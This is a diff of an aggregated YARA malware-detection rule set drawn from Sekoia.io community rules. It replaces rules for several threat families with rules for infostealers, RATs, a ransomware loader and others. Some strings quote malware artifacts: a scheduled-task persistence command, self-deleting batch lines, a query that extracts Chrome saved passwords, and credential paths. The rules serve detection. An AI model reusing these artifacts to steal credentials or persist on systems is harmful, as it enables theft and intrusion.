+		$ = "extract_session_readbuf($conn_id"
+		$ = "Failed connecting to target $addr:$port : $errstr"
+		$ = "void handle_post(String cmd)"
+		$ = "SocketChannel socketChannel = this.get_socket(socket_id"
+		$ = "this.get_svc().compareTo(this.get_hostname())"
 
 	condition:
-		any of ( $cmd* ) and filesize < 20000
+		3 of them and filesize < 10KB
 }
-rule SEKOIA_Apt_Muddywater_Manifestation_Backdoor_Obfuscated : FILE
+rule SEKOIA_Infostealer_Win_Blackguard_Mar23 : FILE
 {
 	meta:
-		description = "Detects obfuscated Muddys manifestation JScript backdoor"
+		description = "Finds BlackGuard samples based on specific strings (March 2023, version 5)"
 		author = "Sekoia.io"
-		id = "58df72a1-822c-4b82-904d-1c0124dc7bc1"
-		date = "2022-01-13"
+		id = "65804d31-2a0c-4b22-a8d9-8cbe1497f155"
+		date = "2023-03-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_muddywater_manifestation_backdoor_obfuscated.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8610f0895fafd2bc9a19bbff816754b563565ba6b105cc3d0a32b80bf5ebdc47"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_blackguard_mar23.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "63d77808036478da0c8d38a6d3581ccd2d4e46ae16ec9e817f09f8b633b01843"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241906,25 +242678,33 @@ rule SEKOIA_Apt_Muddywater_Manifestation_Backdoor_Obfuscated : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$m = { 76 61 72 20 5f 30 78 [4-6] 3d 5b }
-		$w = {57 53 63 72 69 70 74 5b 5f 30 78 [4-6] 28 30 78 [2-3] 29 5d 28 30 78 [2-3] 2a 30 78 [2-3] 29 2c }
-		$t = "subkeys(key));}"
+		$str01 = "==================  5.0 ==============" wide
+		$str02 = "/concerts/disk.php" wide
+		$str03 = "/concerts/memory.php" wide
+		$str04 = "/loader_v2.txt" wide
+		$str05 = "io.solarwallet.app\\Local Storage\\leveldb" wide
+		$str06 = "costura.dotnetzip.dll.compressed" ascii wide
+		$str07 = "set_Laskakakaska" ascii
+		$str08 = "get_Yliana" ascii
+		$str09 = "set_Illeona" ascii
+		$str10 = "set_Gyttettfd" ascii
 
 	condition:
-		$m at 0 and ( $t at ( filesize -16 ) or $w in ( filesize -200 .. filesize ) )
+		uint16( 0 ) == 0x5A4D and 4 of them
 }
-rule SEKOIA_Crimeware_Njrat_Strings : FILE
+
+rule SEKOIA_Infostealer_Win_Irontiger_Chrome_Stealer : FILE
 {
 	meta:
-		description = "Detects njRAT based on some strings"
+		description = "Detect the chrome_stealer malware"
 		author = "Sekoia.io"
-		id = "215807ae-fbcb-478d-8941-e0787b883669"
-		date = "2022-08-22"
+		id = "8c5c3ed0-e1ea-4079-b330-ace8724bff2a"
+		date = "2023-03-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/crimeware_njrat_strings.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "47102adde81682c3c1c856c3495c6f98a9e39aa052eac2ab0a803dab44d19c26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_irontiger_chrome_stealer.yar#L3-L32"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "dfddebf9623661508e993541106d4dcbb2270b311b2902567bd309810aff58dd"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241932,56 +242712,72 @@ rule SEKOIA_Crimeware_Njrat_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "set cdaudio door closed" wide
-		$ = "set cdaudio door open" wide
-		$ = "ping 0" wide
-		$ = "[endof]" wide
-		$ = "TiGeR-Firewall" wide
-		$ = "NetSnifferCs" wide
-		$ = "IPBlocker" wide
-		$ = "Sandboxie Control" wide
+		$ = "passwords.txt"
+		$ = "CryptUnprotectData: 0x%08x"
+		$ = "cookies.txt"
+		$ = "decrypt to %s"
+		$ = ".\\chromedb_tmp" wide ascii
+		$ = "SELECT ORIGIN_URL,USERNAME_VALUE,PASSWORD_VALUE FROM LOGINS;"
+		$ = "decrypt successful!"
+		$ = "url: %s"
+		$ = "user: %s"
+		$ = "pass: %s"
+		$ = "aes key:"
+		$ = "\\Google\\Chrome\\User Data\\Default\\Login Data" wide
+		$ = "password file %s" wide
+		$ = "cookies file %s" wide
+		$ = "keyfile: %s" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 5 of them
+		( uint16( 0 ) == 0x5A4D and all of them ) or pe.imphash ( ) == "e862f5a6671f9dbd6f53d3d557e568f0"
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_10 : FILE
+
+rule SEKOIA_Loader_Win_Revil_Loader
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detect the REvil loader using DDL side loading. The detected ressource is a legitimate executable used to load the malicious .dll containing the ransomware"
 		author = "Sekoia.io"
-		id = "477f8b92-e231-460c-8660-487d0a97f0e2"
-		date = "2023-02-03"
+		id = "3c293e87-e2d7-475a-9536-8b991961fa11"
+		date = "2021-07-19"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/generic_sharpshooter_payload_10.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6ded3f5b7e9c7f2c09e3bc0869e41775e4bb31a39e6fef8209f50f5091e8d2e2"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/revil-ransomware-uses-dll-sideloading"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_revil_loader.yar#L4-L34"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "15680c5e5d801d65e581869ad88d89863c8a51e3f94a3d2f37c02c5fd14df07f"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e"
+		hash2 = "50416e50797cf88a48d086e718c003e2d10c3847b1a251669d6f10f8d3546e03"
+		hash3 = "66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8"
+		hash4 = "81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471"
+		hash5 = "aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7"
+		hash6 = "d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e"
+		hash7 = "dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f"
+		hash8 = "df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e"
 
 	strings:
-		$ = "length = enc.GetByteCount_2(b);"
-		$ = "ms.Write(ba, 0, (length / 4) * 3);"
-		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);"
+		$crypto = ".\\crypto\\" ascii
+		$dropped_name1 = "MsMpEng.exe" wide
+		$dropped_name2 = "mpsvc.dll" ascii
 
 	condition:
-		all of them and filesize < 2MB
+		all of ( $dropped_name* ) and #crypto > 100 and for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a" )
 }
-rule SEKOIA_Implant_Win_Flagpro : FILE
+rule SEKOIA_Infostealer_Win_Vidar_Strings_Nov23 : FILE
 {
 	meta:
-		description = "Detect the Flagpro malware used by Blacktech"
+		description = "Finds Vidar samples based on the specific strings"
 		author = "Sekoia.io"
-		id = "08dd2de4-b359-424f-af04-7f294d519363"
-		date = "2022-04-22"
+		id = "b2c17627-f9b8-4401-b657-1cce560edc76"
+		date = "2023-11-10"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_win_flagpro.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "eb1aba9924af474d6d890572a9bf72e0d1aa5dc31dd4cc34648195b0207ab4d6"
+		reference = "https://twitter.com/crep1x/status/1722652451319202242"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_vidar_strings_nov23.yar#L1-L33"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "1a2fc421fb4058b78de28d97d69b126e685f7677b7998f5b6ae3cbcee0ef3f00"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241989,202 +242785,224 @@ rule SEKOIA_Implant_Win_Flagpro : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "<BODY ID=CV20_LoaderDlg BGCOLOR=LIGHTGREY style=\"font-family:MS Shell Dlg;font-size:8\">" ascii
-		$ = "<TABLE WIDTH=100% HEIGHT=100%>" ascii
-		$ = "<TR WIDTH=100% HEIGHT=45%>" ascii
-		$ = "<TD ALIGN=CENTER VALIGN=BOTTOM>" ascii
-		$ = "TODO: Place controls here." ascii
-		$ = "<TD ALIGN=RIGHT VALIGN=BOTTOM>" ascii
-		$ = "<BUTTON STYLE=\"WIDTH:100\" ID=\"ButtonHelp\">Help</BUTTON>&nbsp;&nbsp;<BUTTON STYLE=\"WIDTH:100\" ID=\"ButtonOK\">OK</BUTTON>&nbsp;<BUTTON STYLE=\"WIDTH:100\" ID=\"ButtonCancel\">Cancel</BUTTON>" ascii
-		$about_loader = /About V[0-9]+\.[0-9]+_Loader.../ wide
-		$path = "f:\\dd\\vctools\\vc7libs\\ship\\atlmfc\\include\\" wide
-		$regitry = "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\" wide
+		$str01 = "MachineID:" ascii
+		$str02 = "Work Dir: In memory" ascii
+		$str03 = "[Hardware]" ascii
+		$str04 = "VideoCard:" ascii
+		$str05 = "[Processes]" ascii
+		$str06 = "[Software]" ascii
+		$str07 = "information.txt" ascii
+		$str08 = "%s\\*" ascii
+		$str09 = "Select * From AntiVirusProduct" ascii
+		$str10 = "SELECT target_path, tab_url from downloads" ascii
+		$str11 = "Software\\Martin Prikryl\\WinSCP 2\\Configuration" ascii
+		$str12 = "UseMasterPassword" ascii
+		$str13 = "Soft: WinSCP" ascii
+		$str14 = "<Pass encoding=\"base64\">" ascii
+		$str15 = "Soft: FileZilla" ascii
+		$str16 = "passwords.txt" ascii
+		$str17 = "build_id" ascii
+		$str18 = "file_data" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and 10 of ( $str* )
 }
-
-rule SEKOIA_Backoor_Win_Gobear
+rule SEKOIA_Rootkit_Win_Purplefox_360_Tct : FILE
 {
 	meta:
-		description = "Detect the GoBear backdoor used by Kimsuky"
+		description = "Detects Purple Fox payloads used during end-2021 and 2022 campaigns based on characteristics shared by TrendMicro details."
 		author = "Sekoia.io"
-		id = "f922bf1b-652e-4a2f-91e9-76ecd2e3bf6a"
-		date = "2024-02-13"
+		id = "e992d574-6a44-4bea-97e2-6d5579ce8d01"
+		date = "2022-03-28"
 		modified = "2024-12-19"
-		reference = "https://medium.com/s2wblog/kimsuky-disguised-as-a-korean-company-signed-with-a-valid-certificate-to-distribute-troll-stealer-cfa5d54314e2"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backoor_win_gobear.yar#L4-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8ca2699058ded62cbf4b78040985a4e5ebce0a1ff94034206c81a4c8e91f479b"
+		reference = "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rootkit_win_purplefox_360_tct.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6b4ca65bc05ea1e8036140a62b94c8b75afe30a5e37cae9a5ae2a9c828cd6275"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$rar = "Rar!"
+		$str0 = "svchost.txt"
+		$str1 = "rundll3222.exe"
+		$str2 = "ojbkcg.exe"
+
 	condition:
-		for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "668031f53390dc749971888029911c12d4171534f77c17a962e698bf121d0e20" )
+		$rar at 0 and all of ( $str* ) and filesize > 800KB and filesize < 2800KB
 }
-rule SEKOIA_Backdoor_Oyster
+rule SEKOIA_Rat_Win_Asyncrat : FILE
 {
 	meta:
-		description = "Detects files related to the Oyster backdoor."
+		description = "Detect AsyncRAT based on specific strings"
 		author = "Sekoia.io"
-		id = "f95f98ea-1e52-45ae-8abf-a986f95d4ab2"
-		date = "2024-08-29"
+		id = "d698e4a1-77ff-4cd7-acb3-27fb16168ceb"
+		date = "2023-01-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_oyster.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ffd84d0c7064bcd69121aa606bc642ff2b5c9927ba622260a02a9689c7ab8878"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_asyncrat.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5e35b034ba1761fae780429be377b70ae8ce62273670042ff067c38ed8bb5a9e"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "CleanUp30.dll" ascii fullword
-		$s2 = "MSTeamsSetup_c_l_.exe" ascii fullword
+		$str01 = "get_ActivatePong" ascii
+		$str02 = "get_SslClient" ascii
+		$str03 = "get_TcpClient" ascii
+		$str04 = "get_SendSync" ascii
+		$str05 = "get_IsConnected" ascii
+		$str06 = "set_UseShellExecute" ascii
+		$str07 = "Pastebin" wide
+		$str08 = "Select * from AntivirusProduct" wide
+		$str09 = "Stub.exe" wide
+		$str10 = "timeout 3 > NUL" wide
+		$str11 = "/c schtasks /create /f /sc onlogon /rl highest /tn " wide
+		$str12 = "\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and 9 of them
 }
-
-rule SEKOIA_Dotnet_Injector_New_Payload : FILE
+rule SEKOIA_Ransomware_Win_Dodo_2023 : FILE
 {
 	meta:
-		description = "New dotnet injector"
+		description = "Rule to detect Dodo ransomware samples."
 		author = "Sekoia.io"
-		id = "b0a1d471-5381-4fa8-8563-7e72ecd15bed"
-		date = "2022-12-21"
+		id = "190977d4-5a7a-4e15-8f90-085f82ec56c8"
+		date = "2023-02-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/dotnet_injector_new_payload.yar#L3-L30"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8b5e2f6e7947471e10e0ec85eef1cebe1904c2e77b7cfe92e578ebe306041842"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_win_dodo_2023.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "01924360ef4bbecd220439290eba22838a3977793fdebd0ef0be74c342c0d152"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "aee45cc2540d49a28e765c30f1c4d0b853c1a74ea2260bd7614ece8e54c3bcb3"
 
 	strings:
-		$f1 = "DownloadFile" ascii
-		$f2 = "StreamReader" ascii
-		$f3 = "ReadToEnd" ascii
-		$f4 = "Reverse" ascii
-		$f5 = "Load" ascii
-		$f6 = "StringToByteArray" ascii
-		$s1 = "Admin" wide
-		$s2 = "User" wide
-		$p1 = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" wide
-		$p2 = ".lnk" wide
+		$s1 = "DODOCRYPTER" ascii wide
+		$s2 = "dodov2" ascii wide
+		$s3 = "dodov2SPREAD.exe" ascii wide
+		$s4 = "dodov2_readit.txt" ascii wide
+		$s5 = "WELCOME, DODO has returned" ascii wide
+		$s6 = "Monero Address: 442n8nf9zojie1JdkZqxDQJFDumBEgZmVZozLdYd5jVPSMws2oUPvNLJKca6JKojyA7zDCZCnMyYnKbY1JLNsbzWK6HNNqW" ascii wide
+		$s7 = "The price for the software is $15. Payment can be made in Bitcoin or XMR." ascii wide
 
 	condition:
-		filesize < 300KB and all of ( $f* ) and all of ( $s* ) and all of ( $p* ) and dotnet.is_dotnet
+		uint16be( 0 ) == 0x4d5a and 4 of them
 }
-rule SEKOIA_Backdoor_Win_Foresttiger : FILE
+rule SEKOIA_Apt_Backdoordiplomaty_Phantomnet : FILE
 {
 	meta:
-		description = "Detect Lazarus' malware ForestTiger"
+		description = "Detects PhantomNet based on strings"
 		author = "Sekoia.io"
-		id = "d3128da2-a86d-4db8-9b75-2f3048831c7e"
-		date = "2023-10-24"
+		id = "bbcc0664-ef2b-47db-a546-b5e0aa2a1e9a"
+		date = "2024-06-06"
 		modified = "2024-12-19"
-		reference = "https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_win_foresttiger.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "401adaad1597c017c976c5b0b8f67851469c95758779b7691ebb037d0dda9f38"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_backdoordiplomaty_phantomnet.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e4be9b9e092dcaa368650b7f696ca532f89752bdbe6b5fd09b4285a643c20b86"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "e06f29dccfe90ae80812c2357171b5c48fba189ae103d28e972067b107e58795"
-		hash2 = "0be1908566efb9d23a98797884f2827de040e4cedb642b60ed66e208715ed4aa"
 
 	strings:
-		$ = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.42"
-		$ = "biwbih="
-		$ = "rlzbiw="
-		$ = "whoami EnDePriv Erro" wide
+		$ = "memory load plugin failed!" wide
+		$ = "Event eee!!!" ascii
+		$ = "LoadWin32_x64.pdb" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 2MB and 2 of them
 }
-rule SEKOIA_Latrodectus_Br4_Js_Dropper
+rule SEKOIA_Apt_Oilrig_Clipog_Strings : FILE
 {
 	meta:
-		description = "Detect the JS script used to drop Latrodectus"
+		description = "Detects OilRig's Clipog stealer"
 		author = "Sekoia.io"
-		id = "042a598d-66fa-4994-a793-228355abd5dd"
-		date = "2024-06-25"
+		id = "0ac40fd9-f67d-41fa-a774-77a3a1b7cac3"
+		date = "2023-10-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/latrodectus_br4_js_dropper.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a835bd9a9ad68fd2f285ec5c04a5c78ba5ca85381ff30048ac375bef220fd72f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_oilrig_clipog_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "16f3fef59db9c58025a4a977de944b628e9dc850f87c1bb22e2f2f97601e5107"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = " installer.InstallProduct(msiPath);" ascii
-		$s2 = "new ActiveXObject(\"WindowsInstaller.Installer\");" ascii
+		$ = "[ClipBoard=" wide
+		$ = "[NUMPAD .]" wide
+		$ = "[SPACE]" wide
+		$ = "GetClipboardData"
 
 	condition:
-		all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 350KB and all of them
 }
-rule SEKOIA_Apt_Ivanti_Krustyloader : FILE
+rule SEKOIA_Infostealer_Win_Stormkitty : FILE
 {
 	meta:
-		description = "Detects KrustyLoader used in the Ivanti campaign"
+		description = "Finds StormKitty samples (or their variants) based on specific strings"
 		author = "Sekoia.io"
-		id = "617fdd5f-7555-49e8-b0ec-2199f017dc40"
-		date = "2024-01-29"
+		id = "5014d2e5-af5c-4800-ab1e-b57de37a2450"
+		date = "2023-03-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_ivanti_krustyloader.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "fe982dffcff4bec78593080d7745aeb32bc2e3b7e0df373bbbd53bc6f53cfcbf"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_stormkitty.yar#L1-L31"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "57a4603faf6af9742db79f9bc8751f3a5c091b6271998434f0a3b9f5c30cb1e8"
 		score = 75
-		quality = 30
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "/proc/self/exe" ascii fullword
-		$s2 = "||||||||||||||"
-		$s3 = "/tmp/"
-		$xor = {40 80 f5}
-		$chunk_1 = {
-        66 0F EF D0
-        66 0F 6F C3
-        66 0F 73 F8 0C
-        66 0F EF C1
-        66 0F EF C2
-        66 0F EF C3
-        }
+		$sk01 = "LimerBoy/StormKitty" ascii wide
+		$sk02 = "StormKitty-Latest.log" wide
+		$sk03 = "StormKitty.exe" ascii
+		$sk04 = "Debug\\StormKitty.pdb" ascii
+		$sk05 = "StormKitty.Implant" ascii
+		$str01 = "set_sUsername" ascii
+		$str02 = "set_sIsSecure" ascii
+		$str03 = "set_sExpMonth" ascii
+		$str04 = "WritePasswords" ascii
+		$str05 = "WriteCookies" ascii
+		$str06 = "sChromiumPswPaths" ascii
+		$str07 = "sGeckoBrowserPaths" ascii
+		$str08 = "Username: {1}" wide
+		$str09 = "Password: {2}" wide
+		$str10 = "encrypted_key\":\"(.*?)\"" wide
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 2MB and all of them and #xor > 2 and #chunk_1 > 6 and @s3 < @s2 and @s2 < @s3 + 300
+		uint16( 0 ) == 0x5A4D and ( ( 1 of ( $sk* ) and 3 of ( $str* ) ) or 7 of ( $str* ) )
 }
-rule SEKOIA_Loader_Win_Konni_Bat : FILE
+rule SEKOIA_Loader_Win_Jinxloader_Strings : FILE
 {
 	meta:
-		description = "Detect the BAT files (named trap.bat or yup.bat) used by KONNI"
+		description = "Finds JinxLoader samples based on the specific strings"
 		author = "Sekoia.io"
-		id = "e8921336-6c91-4b46-bd3f-3cf4a9b31082"
-		date = "2023-09-26"
+		id = "fd2f7e8c-f4a8-4452-bbc6-e03790f8ed89"
+		date = "2023-12-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_konni_bat.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "3476e41461692c3ccfc0ef47a4d5b8822c4940987755763d2a5913e27d9350d4"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_jinxloader_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "816cb6019cba1aa2e229ab476fcdf378348981920cbe17d3dfb875f8b2dcbf81"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242192,140 +243010,111 @@ rule SEKOIA_Loader_Win_Konni_Bat : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "del /f /q \"%~dp0\\*.zip\" > nul"
-		$ = "del /f /q \"%~dp0\\*.xml\" > nul"
-		$ = "del /f /q \"%~dp0\\wpnprv*.dll\" > nul"
-		$ = "del /f /q \"%~dp0\\*.bat\" > nul"
-		$ = "del /f /q \"%~dpnx0\" > nul"
-		$ = "echo %~dp0 | findstr /i \"system32\" > nul"
-		$ = "if %ERRORLEVEL% equ 0 (goto INSTALL) else (goto COPYFILE)"
-		$ = "if exist \"%ProgramFiles(x86)%\" ("
+		$str01 = "JinxV2" ascii
+		$str02 = "main.main.func1" ascii
+		$str03 = "go.shape.struct" ascii
+		$str04 = ".glob..func" ascii
 
 	condition:
-		3 of them and filesize < 3KB
+		uint16( 0 ) == 0x5A4D and all of them and #str04 > 100 and filesize > 8MB
 }
-rule SEKOIA_Downloader_Kimsuky_Lnk
+rule SEKOIA_Apt_Reaper_Malicious_Lnk : FILE
 {
 	meta:
-		description = "Detect Kimsuky LNK"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "3831d115-7874-4bc9-aeb4-d2cb9bc2b5c9"
-		date = "2024-07-16"
+		id = "8f055d1b-5727-4d77-9671-cdbb1ea69d5f"
+		date = "2023-09-12"
 		modified = "2024-12-19"
-		reference = "https://blogs.jpcert.or.jp/en/2024/07/attack-activities-by-kimsuky-targeting-japanese-organizations.html"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_kimsuky_lnk.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "3512c8c21203a015b316c2a993db1a8c10420df06ea97d84a6e350550a628230"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_reaper_malicious_lnk.yar#L1-L15"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
